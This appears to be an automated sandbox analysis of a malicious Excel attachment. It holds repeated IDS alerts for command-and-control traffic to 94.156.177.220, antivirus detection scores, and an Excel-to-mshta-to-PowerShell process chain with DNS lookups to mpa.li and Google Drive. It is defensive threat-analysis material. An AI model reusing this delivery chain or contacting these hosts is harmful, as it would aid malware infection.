        2024-10-24T08:47:25.191206+020020243131Malware Command and Control Activity Detected192.168.2.224924394.156.177.22080TCP
        2024-10-24T08:47:26.304249+020020243131Malware Command and Control Activity Detected192.168.2.224924494.156.177.22080TCP
        2024-10-24T08:47:27.421647+020020243131Malware Command and Control Activity Detected192.168.2.224924594.156.177.22080TCP
        2024-10-24T08:47:28.598214+020020243131Malware Command and Control Activity Detected192.168.2.224924694.156.177.22080TCP
        2024-10-24T08:47:29.692195+020020243131Malware Command and Control Activity Detected192.168.2.224924794.156.177.22080TCP
        2024-10-24T08:47:30.943851+020020243131Malware Command and Control Activity Detected192.168.2.224924894.156.177.22080TCP
        2024-10-24T08:47:32.217248+020020243131Malware Command and Control Activity Detected192.168.2.224924994.156.177.22080TCP
        2024-10-24T08:47:33.316783+020020243131Malware Command and Control Activity Detected192.168.2.224925094.156.177.22080TCP
        2024-10-24T08:47:34.466932+020020243131Malware Command and Control Activity Detected192.168.2.224925194.156.177.22080TCP
        2024-10-24T08:47:36.171721+020020243131Malware Command and Control Activity Detected192.168.2.224925294.156.177.22080TCP
        2024-10-24T08:47:37.350269+020020243131Malware Command and Control Activity Detected192.168.2.224925394.156.177.22080TCP
        2024-10-24T08:47:38.481255+020020243131Malware Command and Control Activity Detected192.168.2.224925494.156.177.22080TCP
        2024-10-24T08:47:39.590691+020020243131Malware Command and Control Activity Detected192.168.2.224925594.156.177.22080TCP
        2024-10-24T08:47:40.694535+020020243131Malware Command and Control Activity Detected192.168.2.224925694.156.177.22080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:46:10.615957+020020243181Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
        2024-10-24T08:46:11.760826+020020243181Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
        2024-10-24T08:46:13.013301+020020243181Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
        2024-10-24T08:46:14.275753+020020243181Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
        2024-10-24T08:46:15.610265+020020243181Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
        2024-10-24T08:46:17.050811+020020243181Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
        2024-10-24T08:46:18.216510+020020243181Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
        2024-10-24T08:46:19.333801+020020243181Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
        2024-10-24T08:46:20.604827+020020243181Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
        2024-10-24T08:46:21.710093+020020243181Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
        2024-10-24T08:46:22.808952+020020243181Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
        2024-10-24T08:46:24.246938+020020243181Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
        2024-10-24T08:46:25.331525+020020243181Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
        2024-10-24T08:46:26.551291+020020243181Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
        2024-10-24T08:46:28.251730+020020243181Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
        2024-10-24T08:46:29.338163+020020243181Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
        2024-10-24T08:46:30.655966+020020243181Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
        2024-10-24T08:46:31.856886+020020243181Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
        2024-10-24T08:46:33.155234+020020243181Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
        2024-10-24T08:46:34.578342+020020243181Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
        2024-10-24T08:46:35.676631+020020243181Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
        2024-10-24T08:46:36.783619+020020243181Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
        2024-10-24T08:46:37.966886+020020243181Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
        2024-10-24T08:46:39.114628+020020243181Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
        2024-10-24T08:46:40.223656+020020243181Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
        2024-10-24T08:46:41.328860+020020243181Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
        2024-10-24T08:46:42.424772+020020243181Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
        2024-10-24T08:46:43.523331+020020243181Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
        2024-10-24T08:46:44.664054+020020243181Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
        2024-10-24T08:46:45.984133+020020243181Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
        2024-10-24T08:46:47.107551+020020243181Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
        2024-10-24T08:46:48.810873+020020243181Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
        2024-10-24T08:46:50.129192+020020243181Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
        2024-10-24T08:46:51.214727+020020243181Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
        2024-10-24T08:46:52.324683+020020243181Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
        2024-10-24T08:46:53.452603+020020243181Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
        2024-10-24T08:46:54.556519+020020243181Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
        2024-10-24T08:46:55.732586+020020243181Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
        2024-10-24T08:46:56.915668+020020243181Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
        2024-10-24T08:46:58.072935+020020243181Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
        2024-10-24T08:46:59.198997+020020243181Malware Command and Control Activity Detected192.168.2.224922194.156.177.22080TCP
        2024-10-24T08:47:00.299934+020020243181Malware Command and Control Activity Detected192.168.2.224922294.156.177.22080TCP
        2024-10-24T08:47:01.467081+020020243181Malware Command and Control Activity Detected192.168.2.224922394.156.177.22080TCP
        2024-10-24T08:47:03.911969+020020243181Malware Command and Control Activity Detected192.168.2.224922494.156.177.22080TCP
        2024-10-24T08:47:05.015239+020020243181Malware Command and Control Activity Detected192.168.2.224922594.156.177.22080TCP
        2024-10-24T08:47:06.127566+020020243181Malware Command and Control Activity Detected192.168.2.224922694.156.177.22080TCP
        2024-10-24T08:47:07.235602+020020243181Malware Command and Control Activity Detected192.168.2.224922794.156.177.22080TCP
        2024-10-24T08:47:08.350903+020020243181Malware Command and Control Activity Detected192.168.2.224922894.156.177.22080TCP
        2024-10-24T08:47:09.473326+020020243181Malware Command and Control Activity Detected192.168.2.224922994.156.177.22080TCP
        2024-10-24T08:47:10.574642+020020243181Malware Command and Control Activity Detected192.168.2.224923094.156.177.22080TCP
        2024-10-24T08:47:11.695700+020020243181Malware Command and Control Activity Detected192.168.2.224923194.156.177.22080TCP
        2024-10-24T08:47:12.799153+020020243181Malware Command and Control Activity Detected192.168.2.224923294.156.177.22080TCP
        2024-10-24T08:47:14.031658+020020243181Malware Command and Control Activity Detected192.168.2.224923394.156.177.22080TCP
        2024-10-24T08:47:15.182608+020020243181Malware Command and Control Activity Detected192.168.2.224923494.156.177.22080TCP
        2024-10-24T08:47:16.271864+020020243181Malware Command and Control Activity Detected192.168.2.224923594.156.177.22080TCP
        2024-10-24T08:47:17.383378+020020243181Malware Command and Control Activity Detected192.168.2.224923694.156.177.22080TCP
        2024-10-24T08:47:18.474819+020020243181Malware Command and Control Activity Detected192.168.2.224923794.156.177.22080TCP
        2024-10-24T08:47:19.574207+020020243181Malware Command and Control Activity Detected192.168.2.224923894.156.177.22080TCP
        2024-10-24T08:47:20.702266+020020243181Malware Command and Control Activity Detected192.168.2.224923994.156.177.22080TCP
        2024-10-24T08:47:21.798439+020020243181Malware Command and Control Activity Detected192.168.2.224924094.156.177.22080TCP
        2024-10-24T08:47:22.966218+020020243181Malware Command and Control Activity Detected192.168.2.224924194.156.177.22080TCP
        2024-10-24T08:47:24.081988+020020243181Malware Command and Control Activity Detected192.168.2.224924294.156.177.22080TCP
        2024-10-24T08:47:25.191206+020020243181Malware Command and Control Activity Detected192.168.2.224924394.156.177.22080TCP
        2024-10-24T08:47:26.304249+020020243181Malware Command and Control Activity Detected192.168.2.224924494.156.177.22080TCP
        2024-10-24T08:47:27.421647+020020243181Malware Command and Control Activity Detected192.168.2.224924594.156.177.22080TCP
        2024-10-24T08:47:28.598214+020020243181Malware Command and Control Activity Detected192.168.2.224924694.156.177.22080TCP
        2024-10-24T08:47:29.692195+020020243181Malware Command and Control Activity Detected192.168.2.224924794.156.177.22080TCP
        2024-10-24T08:47:30.943851+020020243181Malware Command and Control Activity Detected192.168.2.224924894.156.177.22080TCP
        2024-10-24T08:47:32.217248+020020243181Malware Command and Control Activity Detected192.168.2.224924994.156.177.22080TCP
        2024-10-24T08:47:33.316783+020020243181Malware Command and Control Activity Detected192.168.2.224925094.156.177.22080TCP
        2024-10-24T08:47:34.466932+020020243181Malware Command and Control Activity Detected192.168.2.224925194.156.177.22080TCP
        2024-10-24T08:47:36.171721+020020243181Malware Command and Control Activity Detected192.168.2.224925294.156.177.22080TCP
        2024-10-24T08:47:37.350269+020020243181Malware Command and Control Activity Detected192.168.2.224925394.156.177.22080TCP
        2024-10-24T08:47:38.481255+020020243181Malware Command and Control Activity Detected192.168.2.224925494.156.177.22080TCP
        2024-10-24T08:47:39.590691+020020243181Malware Command and Control Activity Detected192.168.2.224925594.156.177.22080TCP
        2024-10-24T08:47:40.694535+020020243181Malware Command and Control Activity Detected192.168.2.224925694.156.177.22080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:46:07.501003+020020216411A Network Trojan was detected192.168.2.224917894.156.177.22080TCP
        2024-10-24T08:46:08.603129+020020216411A Network Trojan was detected192.168.2.224917994.156.177.22080TCP
        2024-10-24T08:46:09.653987+020020216411A Network Trojan was detected192.168.2.224918094.156.177.22080TCP
        2024-10-24T08:46:10.793925+020020216411A Network Trojan was detected192.168.2.224918194.156.177.22080TCP
        2024-10-24T08:46:11.962080+020020216411A Network Trojan was detected192.168.2.224918294.156.177.22080TCP
        2024-10-24T08:46:13.263396+020020216411A Network Trojan was detected192.168.2.224918394.156.177.22080TCP
        2024-10-24T08:46:14.530065+020020216411A Network Trojan was detected192.168.2.224918494.156.177.22080TCP
        2024-10-24T08:46:15.797609+020020216411A Network Trojan was detected192.168.2.224918594.156.177.22080TCP
        2024-10-24T08:46:17.256132+020020216411A Network Trojan was detected192.168.2.224918694.156.177.22080TCP
        2024-10-24T08:46:18.375546+020020216411A Network Trojan was detected192.168.2.224918894.156.177.22080TCP
        2024-10-24T08:46:19.648513+020020216411A Network Trojan was detected192.168.2.224918994.156.177.22080TCP
        2024-10-24T08:46:20.762214+020020216411A Network Trojan was detected192.168.2.224919094.156.177.22080TCP
        2024-10-24T08:46:21.849543+020020216411A Network Trojan was detected192.168.2.224919194.156.177.22080TCP
        2024-10-24T08:46:23.281189+020020216411A Network Trojan was detected192.168.2.224919294.156.177.22080TCP
        2024-10-24T08:46:24.390800+020020216411A Network Trojan was detected192.168.2.224919394.156.177.22080TCP
        2024-10-24T08:46:25.483247+020020216411A Network Trojan was detected192.168.2.224919494.156.177.22080TCP
        2024-10-24T08:46:26.725660+020020216411A Network Trojan was detected192.168.2.224919594.156.177.22080TCP
        2024-10-24T08:46:28.399061+020020216411A Network Trojan was detected192.168.2.224919694.156.177.22080TCP
        2024-10-24T08:46:29.683232+020020216411A Network Trojan was detected192.168.2.224919794.156.177.22080TCP
        2024-10-24T08:46:30.898100+020020216411A Network Trojan was detected192.168.2.224919894.156.177.22080TCP
        2024-10-24T08:46:32.194843+020020216411A Network Trojan was detected192.168.2.224919994.156.177.22080TCP
        2024-10-24T08:46:33.628718+020020216411A Network Trojan was detected192.168.2.224920094.156.177.22080TCP
        2024-10-24T08:46:34.733384+020020216411A Network Trojan was detected192.168.2.224920194.156.177.22080TCP
        2024-10-24T08:46:35.832085+020020216411A Network Trojan was detected192.168.2.224920294.156.177.22080TCP
        2024-10-24T08:46:37.014681+020020216411A Network Trojan was detected192.168.2.224920394.156.177.22080TCP
        2024-10-24T08:46:38.149338+020020216411A Network Trojan was detected192.168.2.224920494.156.177.22080TCP
        2024-10-24T08:46:39.259709+020020216411A Network Trojan was detected192.168.2.224920594.156.177.22080TCP
        2024-10-24T08:46:40.378743+020020216411A Network Trojan was detected192.168.2.224920694.156.177.22080TCP
        2024-10-24T08:46:41.479514+020020216411A Network Trojan was detected192.168.2.224920794.156.177.22080TCP
        2024-10-24T08:46:42.564513+020020216411A Network Trojan was detected192.168.2.224920894.156.177.22080TCP
        2024-10-24T08:46:43.679806+020020216411A Network Trojan was detected192.168.2.224920994.156.177.22080TCP
        2024-10-24T08:46:45.035157+020020216411A Network Trojan was detected192.168.2.224921094.156.177.22080TCP
        2024-10-24T08:46:46.148100+020020216411A Network Trojan was detected192.168.2.224921194.156.177.22080TCP
        2024-10-24T08:46:47.878298+020020216411A Network Trojan was detected192.168.2.224921294.156.177.22080TCP
        2024-10-24T08:46:49.169376+020020216411A Network Trojan was detected192.168.2.224921394.156.177.22080TCP
        2024-10-24T08:46:50.273713+020020216411A Network Trojan was detected192.168.2.224921494.156.177.22080TCP
        2024-10-24T08:46:51.369260+020020216411A Network Trojan was detected192.168.2.224921594.156.177.22080TCP
        2024-10-24T08:46:52.485586+020020216411A Network Trojan was detected192.168.2.224921694.156.177.22080TCP
        2024-10-24T08:46:53.624164+020020216411A Network Trojan was detected192.168.2.224921794.156.177.22080TCP
        2024-10-24T08:46:54.754980+020020216411A Network Trojan was detected192.168.2.224921894.156.177.22080TCP
        2024-10-24T08:46:55.935933+020020216411A Network Trojan was detected192.168.2.224921994.156.177.22080TCP
        2024-10-24T08:46:57.102699+020020216411A Network Trojan was detected192.168.2.224922094.156.177.22080TCP
        2024-10-24T08:46:58.242857+020020216411A Network Trojan was detected192.168.2.224922194.156.177.22080TCP
        2024-10-24T08:46:59.354586+020020216411A Network Trojan was detected192.168.2.224922294.156.177.22080TCP
        2024-10-24T08:47:00.514142+020020216411A Network Trojan was detected192.168.2.224922394.156.177.22080TCP
        2024-10-24T08:47:02.970814+020020216411A Network Trojan was detected192.168.2.224922494.156.177.22080TCP
        2024-10-24T08:47:04.071738+020020216411A Network Trojan was detected192.168.2.224922594.156.177.22080TCP
        2024-10-24T08:47:05.171077+020020216411A Network Trojan was detected192.168.2.224922694.156.177.22080TCP
        2024-10-24T08:47:06.288133+020020216411A Network Trojan was detected192.168.2.224922794.156.177.22080TCP
        2024-10-24T08:47:07.393228+020020216411A Network Trojan was detected192.168.2.224922894.156.177.22080TCP
        2024-10-24T08:47:08.518293+020020216411A Network Trojan was detected192.168.2.224922994.156.177.22080TCP
        2024-10-24T08:47:09.627438+020020216411A Network Trojan was detected192.168.2.224923094.156.177.22080TCP
        2024-10-24T08:47:10.737748+020020216411A Network Trojan was detected192.168.2.224923194.156.177.22080TCP
        2024-10-24T08:47:11.855700+020020216411A Network Trojan was detected192.168.2.224923294.156.177.22080TCP
        2024-10-24T08:47:12.955608+020020216411A Network Trojan was detected192.168.2.224923394.156.177.22080TCP
        2024-10-24T08:47:14.230832+020020216411A Network Trojan was detected192.168.2.224923494.156.177.22080TCP
        2024-10-24T08:47:15.332422+020020216411A Network Trojan was detected192.168.2.224923594.156.177.22080TCP
        2024-10-24T08:47:16.428303+020020216411A Network Trojan was detected192.168.2.224923694.156.177.22080TCP
        2024-10-24T08:47:17.547052+020020216411A Network Trojan was detected192.168.2.224923794.156.177.22080TCP
        2024-10-24T08:47:18.627837+020020216411A Network Trojan was detected192.168.2.224923894.156.177.22080TCP
        2024-10-24T08:47:19.754722+020020216411A Network Trojan was detected192.168.2.224923994.156.177.22080TCP
        2024-10-24T08:47:20.851688+020020216411A Network Trojan was detected192.168.2.224924094.156.177.22080TCP
        2024-10-24T08:47:22.015332+020020216411A Network Trojan was detected192.168.2.224924194.156.177.22080TCP
        2024-10-24T08:47:23.119040+020020216411A Network Trojan was detected192.168.2.224924294.156.177.22080TCP
        2024-10-24T08:47:24.247331+020020216411A Network Trojan was detected192.168.2.224924394.156.177.22080TCP
        2024-10-24T08:47:25.347820+020020216411A Network Trojan was detected192.168.2.224924494.156.177.22080TCP
        2024-10-24T08:47:26.454873+020020216411A Network Trojan was detected192.168.2.224924594.156.177.22080TCP
        2024-10-24T08:47:27.639729+020020216411A Network Trojan was detected192.168.2.224924694.156.177.22080TCP
        2024-10-24T08:47:28.744434+020020216411A Network Trojan was detected192.168.2.224924794.156.177.22080TCP
        2024-10-24T08:47:29.996929+020020216411A Network Trojan was detected192.168.2.224924894.156.177.22080TCP
        2024-10-24T08:47:31.153128+020020216411A Network Trojan was detected192.168.2.224924994.156.177.22080TCP
        2024-10-24T08:47:32.364981+020020216411A Network Trojan was detected192.168.2.224925094.156.177.22080TCP
        2024-10-24T08:47:33.527794+020020216411A Network Trojan was detected192.168.2.224925194.156.177.22080TCP
        2024-10-24T08:47:34.612892+020020216411A Network Trojan was detected192.168.2.224925294.156.177.22080TCP
        2024-10-24T08:47:36.386309+020020216411A Network Trojan was detected192.168.2.224925394.156.177.22080TCP
        2024-10-24T08:47:37.498724+020020216411A Network Trojan was detected192.168.2.224925494.156.177.22080TCP
        2024-10-24T08:47:38.645072+020020216411A Network Trojan was detected192.168.2.224925594.156.177.22080TCP
        2024-10-24T08:47:39.740085+020020216411A Network Trojan was detected192.168.2.224925694.156.177.22080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:45:47.325286+020020490381A Network Trojan was detected142.250.186.97443192.168.2.2249169TCP
        2024-10-24T08:46:06.918306+020020490381A Network Trojan was detected142.250.186.97443192.168.2.2249176TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:47:28.606339+020020350651Malware Command and Control Activity Detected94.156.177.22080192.168.2.2249246TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:46:07.501003+020028257661Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
        2024-10-24T08:46:08.603129+020028257661Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
        2024-10-24T08:46:09.653987+020028257661Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
        2024-10-24T08:46:10.793925+020028257661Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
        2024-10-24T08:46:11.962080+020028257661Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
        2024-10-24T08:46:13.263396+020028257661Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
        2024-10-24T08:46:14.530065+020028257661Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
        2024-10-24T08:46:15.797609+020028257661Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
        2024-10-24T08:46:17.256132+020028257661Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
        2024-10-24T08:46:18.375546+020028257661Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
        2024-10-24T08:46:19.648513+020028257661Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
        2024-10-24T08:46:20.762214+020028257661Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
        2024-10-24T08:46:21.849543+020028257661Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
        2024-10-24T08:46:23.281189+020028257661Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
        2024-10-24T08:46:24.390800+020028257661Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
        2024-10-24T08:46:25.483247+020028257661Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
        2024-10-24T08:46:26.725660+020028257661Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
        2024-10-24T08:46:28.399061+020028257661Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
        2024-10-24T08:46:29.683232+020028257661Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
        2024-10-24T08:46:30.898100+020028257661Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
        2024-10-24T08:46:32.194843+020028257661Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
        2024-10-24T08:46:33.628718+020028257661Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
        2024-10-24T08:46:34.733384+020028257661Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
        2024-10-24T08:46:35.832085+020028257661Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
        2024-10-24T08:46:37.014681+020028257661Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
        2024-10-24T08:46:38.149338+020028257661Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
        2024-10-24T08:46:39.259709+020028257661Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
        2024-10-24T08:46:40.378743+020028257661Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
        2024-10-24T08:46:41.479514+020028257661Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
        2024-10-24T08:46:42.564513+020028257661Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
        2024-10-24T08:46:43.679806+020028257661Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
        2024-10-24T08:46:45.035157+020028257661Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
        2024-10-24T08:46:46.148100+020028257661Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
        2024-10-24T08:46:47.878298+020028257661Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
        2024-10-24T08:46:49.169376+020028257661Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
        2024-10-24T08:46:50.273713+020028257661Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
        2024-10-24T08:46:51.369260+020028257661Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
        2024-10-24T08:46:52.485586+020028257661Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
        2024-10-24T08:46:53.624164+020028257661Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
        2024-10-24T08:46:54.754980+020028257661Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
        2024-10-24T08:46:55.935933+020028257661Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
        2024-10-24T08:46:57.102699+020028257661Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
        2024-10-24T08:46:58.242857+020028257661Malware Command and Control Activity Detected192.168.2.224922194.156.177.22080TCP
        2024-10-24T08:46:59.354586+020028257661Malware Command and Control Activity Detected192.168.2.224922294.156.177.22080TCP
        2024-10-24T08:47:00.514142+020028257661Malware Command and Control Activity Detected192.168.2.224922394.156.177.22080TCP
        2024-10-24T08:47:02.970814+020028257661Malware Command and Control Activity Detected192.168.2.224922494.156.177.22080TCP
        2024-10-24T08:47:04.071738+020028257661Malware Command and Control Activity Detected192.168.2.224922594.156.177.22080TCP
        2024-10-24T08:47:05.171077+020028257661Malware Command and Control Activity Detected192.168.2.224922694.156.177.22080TCP
        2024-10-24T08:47:06.288133+020028257661Malware Command and Control Activity Detected192.168.2.224922794.156.177.22080TCP
        2024-10-24T08:47:07.393228+020028257661Malware Command and Control Activity Detected192.168.2.224922894.156.177.22080TCP
        2024-10-24T08:47:08.518293+020028257661Malware Command and Control Activity Detected192.168.2.224922994.156.177.22080TCP
        2024-10-24T08:47:09.627438+020028257661Malware Command and Control Activity Detected192.168.2.224923094.156.177.22080TCP
        2024-10-24T08:47:10.737748+020028257661Malware Command and Control Activity Detected192.168.2.224923194.156.177.22080TCP
        2024-10-24T08:47:11.855700+020028257661Malware Command and Control Activity Detected192.168.2.224923294.156.177.22080TCP
        2024-10-24T08:47:12.955608+020028257661Malware Command and Control Activity Detected192.168.2.224923394.156.177.22080TCP
        2024-10-24T08:47:14.230832+020028257661Malware Command and Control Activity Detected192.168.2.224923494.156.177.22080TCP
        2024-10-24T08:47:15.332422+020028257661Malware Command and Control Activity Detected192.168.2.224923594.156.177.22080TCP
        2024-10-24T08:47:16.428303+020028257661Malware Command and Control Activity Detected192.168.2.224923694.156.177.22080TCP
        2024-10-24T08:47:17.547052+020028257661Malware Command and Control Activity Detected192.168.2.224923794.156.177.22080TCP
        2024-10-24T08:47:18.627837+020028257661Malware Command and Control Activity Detected192.168.2.224923894.156.177.22080TCP
        2024-10-24T08:47:19.754722+020028257661Malware Command and Control Activity Detected192.168.2.224923994.156.177.22080TCP
        2024-10-24T08:47:20.851688+020028257661Malware Command and Control Activity Detected192.168.2.224924094.156.177.22080TCP
        2024-10-24T08:47:22.015332+020028257661Malware Command and Control Activity Detected192.168.2.224924194.156.177.22080TCP
        2024-10-24T08:47:23.119040+020028257661Malware Command and Control Activity Detected192.168.2.224924294.156.177.22080TCP
        2024-10-24T08:47:24.247331+020028257661Malware Command and Control Activity Detected192.168.2.224924394.156.177.22080TCP
        2024-10-24T08:47:25.347820+020028257661Malware Command and Control Activity Detected192.168.2.224924494.156.177.22080TCP
        2024-10-24T08:47:26.454873+020028257661Malware Command and Control Activity Detected192.168.2.224924594.156.177.22080TCP
        2024-10-24T08:47:27.639729+020028257661Malware Command and Control Activity Detected192.168.2.224924694.156.177.22080TCP
        2024-10-24T08:47:28.744434+020028257661Malware Command and Control Activity Detected192.168.2.224924794.156.177.22080TCP
        2024-10-24T08:47:29.996929+020028257661Malware Command and Control Activity Detected192.168.2.224924894.156.177.22080TCP
        2024-10-24T08:47:31.153128+020028257661Malware Command and Control Activity Detected192.168.2.224924994.156.177.22080TCP
        2024-10-24T08:47:32.364981+020028257661Malware Command and Control Activity Detected192.168.2.224925094.156.177.22080TCP
        2024-10-24T08:47:33.527794+020028257661Malware Command and Control Activity Detected192.168.2.224925194.156.177.22080TCP
        2024-10-24T08:47:34.612892+020028257661Malware Command and Control Activity Detected192.168.2.224925294.156.177.22080TCP
        2024-10-24T08:47:36.386309+020028257661Malware Command and Control Activity Detected192.168.2.224925394.156.177.22080TCP
        2024-10-24T08:47:37.498724+020028257661Malware Command and Control Activity Detected192.168.2.224925494.156.177.22080TCP
        2024-10-24T08:47:38.645072+020028257661Malware Command and Control Activity Detected192.168.2.224925594.156.177.22080TCP
        2024-10-24T08:47:39.740085+020028257661Malware Command and Control Activity Detected192.168.2.224925694.156.177.22080TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: Shipping Documents WMLREF115900.xlsVirustotal: Detection: 25%Perma Link
        Source: Shipping Documents WMLREF115900.xlsReversingLabs: Detection: 21%
        Source: Shipping Documents WMLREF115900.xlsJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49169 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.22:49175 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49176 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: unknownHTTPS traffic detected: 5.159.62.244:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49172 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49173 version: TLS 1.2
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.pdbhP source: powershell.exe, 00000011.00000002.481877021.000000000283A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.pdb source: powershell.exe, 00000005.00000002.442283646.0000000003A4E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.pdb source: powershell.exe, 00000011.00000002.481877021.0000000002687000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.pdbhP source: powershell.exe, 00000005.00000002.442283646.0000000003A62000.00000004.00000800.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global trafficDNS query: name: mpa.li
        Source: global trafficDNS query: name: mpa.li
        Source: global trafficDNS query: name: drive.google.com
        Source: global trafficDNS query: name: drive.usercontent.google.com
        Source: global trafficDNS query: name: mpa.li
        Source: global trafficDNS query: name: mpa.li
        Source: global trafficDNS query: name: drive.google.com
        Source: global trafficDNS query: name: drive.usercontent.google.com
        Source: global trafficDNS query: name: drive.usercontent.google.com
